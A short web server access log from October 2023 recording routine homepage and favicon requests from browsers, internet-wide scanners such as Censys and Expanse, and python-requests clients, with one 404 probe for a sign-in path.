27.102.81.240 - - [04/Oct/2023:02:27:25 +0200] "GET /users/sign_in HTTP/1.0" 404 314 "-" "-"
67.217.57.54 - - [04/Oct/2023:02:32:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
68.183.48.159 - - [04/Oct/2023:02:36:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
67.217.57.54 - - [04/Oct/2023:02:39:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.216.149.223 - - [04/Oct/2023:02:44:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
68.183.48.159 - - [04/Oct/2023:02:48:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
68.183.48.159 - - [04/Oct/2023:02:48:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.85/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
67.217.57.54 - - [04/Oct/2023:02:49:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
67.217.57.54 - - [04/Oct/2023:02:50:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
67.217.57.54 - - [04/Oct/2023:02:51:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.248.133.126 - - [04/Oct/2023:03:01:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.126 - - [04/Oct/2023:03:01:53 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.126 - - [04/Oct/2023:03:01:53 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
67.217.57.54 - - [04/Oct/2023:03:02:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.140.130.61 - - [04/Oct/2023:03:05:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.76.96.55 - - [04/Oct/2023:03:05:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
71.6.134.235 - - [04/Oct/2023:03:11:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
